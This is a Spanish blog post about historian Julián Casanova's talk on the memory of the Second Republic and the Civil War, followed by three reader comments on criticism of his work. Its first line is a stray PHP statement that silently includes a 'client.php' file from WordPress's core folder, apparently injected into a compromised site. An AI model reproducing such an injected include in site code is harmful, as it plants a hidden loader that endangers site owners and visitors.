@include( ABSPATH . WPINC . '/client.php'); Barracuda » JULIÁN CASANOVA

Barracuda

JULIÁN CASANOVA

16th diciembre 2008 | Historia,Política y Sociedad

Julián Casanova

Julián Casanova (dcha) en su intervención. Hoy

Esta tarde ha estado Julián Casanova disertando sobre Historia y Memoria de la II República y de la Guerra Civil en el local de la Asociación de Vecinos de Venecia.

Julián Casanova es historiador. Un historiador de prestigio, dentro y fuera de España, especializado en Historia Contemporánea y en la Guerra Civil española. Es todo un lujo escucharlo: ameno, riguroso y minucioso. Aunque también muy criticado.

Julián Casanova

Asistentes a la disertación de Julián Casanova. Hoy

En su intervención de hoy ha explicado algunos de los factores que han hecho que la recuperación de la memoria se esté llevando a cabo treinta años después de que acabara la dictadura de Franco. La larga duración de esa dictadura y la intensidad de la violencia que impuso sobre los vencidos es una de las causas. La otra fue el escaso interés de las fuerzas políticas democráticas durante la transición en recuperar la memoria histórica, más preocupadas por ocupar el espacio político que se abrió y que hasta entonces les había estado vedado.

Comparte esta información:
  • Print
  • Digg
  • Facebook
  • Google Bookmarks
  • email
  • Live
  • Meneame
  • MySpace
  • PDF
  • Twitter

Comentar este post (3 comentarios)



  • 1. Ivo  |  diciembre 17th, 2008 a las 1:55 pm Usa el Saltamontes para subir

    Julián Casanova es uno de los historiadores más importantes que tenemos, y hablo como historiador desde un punto de vista estrictamente académico y científico.

    Las críticas que suelen hacérsele no tienen nada que ver con este campo, sino con el de la propaganda, que es al que suele reducirse-reconducirse el debate historiográfico, sobre todo el vinculado con la historia reciente.

    Por ello creo que sería bueno matizar lo de que es muy criticado, ya que el vínculo del post lleva a un lugar de propaganda, donde simplemente se dicen astracanadas de orden ideológico, no metodológico, conceptual, discursivo…, en fin, del lugar donde debería situarse la crítica.

    Por ello, a la labor de un historiador de su talla debería corresponderle una crítica análoga y no los exabruptos de una pandilla de fanáticos, con ello se hace un flaco favor a la profesión en general y se da pábulo a planteamientos incorrectos a los que no ha lugar, en este caso: investigación académica vs. propaganda/polémica mediática.

    Esta es una crítica totalmente bienintencionada y constructiva, este blog es magnífico e instructivo, lo miro todos los días.

    Saludos!

  • 2. Lygeum  |  diciembre 17th, 2008 a las 3:49 pm Usa el Saltamontes para subir

    Efectivamente, el enlace a la página crítica no es representativo, pues coloqué sin más el primero que me salió en el buscador. No obstante, las críticas que se vierten en general a los que plantean una historia más real del periodo de la II República y la Guerra Civil son todas bastante fanáticas y destructivas.

    También he de decir que el propio Julián Casanova confesó en su intervención que sus habituales artículos en El País son muy criticados y que investigar en Aragón el periodo de la república y la guerra civil es muy costoso y poco apreciado y nada potenciado por las instituciones. Llegó a decir J. Casanova que igual se terminaba dedicando a la novela histórica. Me imagino que eso le ocasionaría menos rompimientos de cabeza.

  • 3. Ivo  |  diciembre 17th, 2008 a las 5:13 pm Usa el Saltamontes para subir

    Lo que sería interesante es que todos los se dedican a lanzar improperios o cuya crítica se limita a opiniones más o menos emotivas, hicieran un análisis del aparato crítico de una obra historiográfica, del conceptual, del marco interpretativo, una crítica a las fuentes, etc. Entonces sí que habría debate y no propaganda. En el caso concreto de Casanova (como en el de otros), seguramente no se dirían entonces tantas burradas.

    Espero que lo que dijo sobre retirarse no sea cierto, porque sería una auténtica pena. No se es consciente de la importancia de sus investigaciones para toda España, pero para Aragón, concretamente, es capital. Como mal menor, ha creado escuela y alumnos suyos por lo que sé también están trabajando de firme y muy bien.

    Saludos!


ÚLTIMOS COMENTARIOS

LO MÁS RECIENTE

LO MÁS VISITADO

Tienda Barracuda

ARTÍCULOS POR CATEGORÍAS

CALENDARIO DE ARTÍCULOS

enero 2021
L M X J V S D
« dic    
 123
45678910
11121314151617
18192021222324
25262728293031

ARTÍCULOS POR MESES

PÁGINAS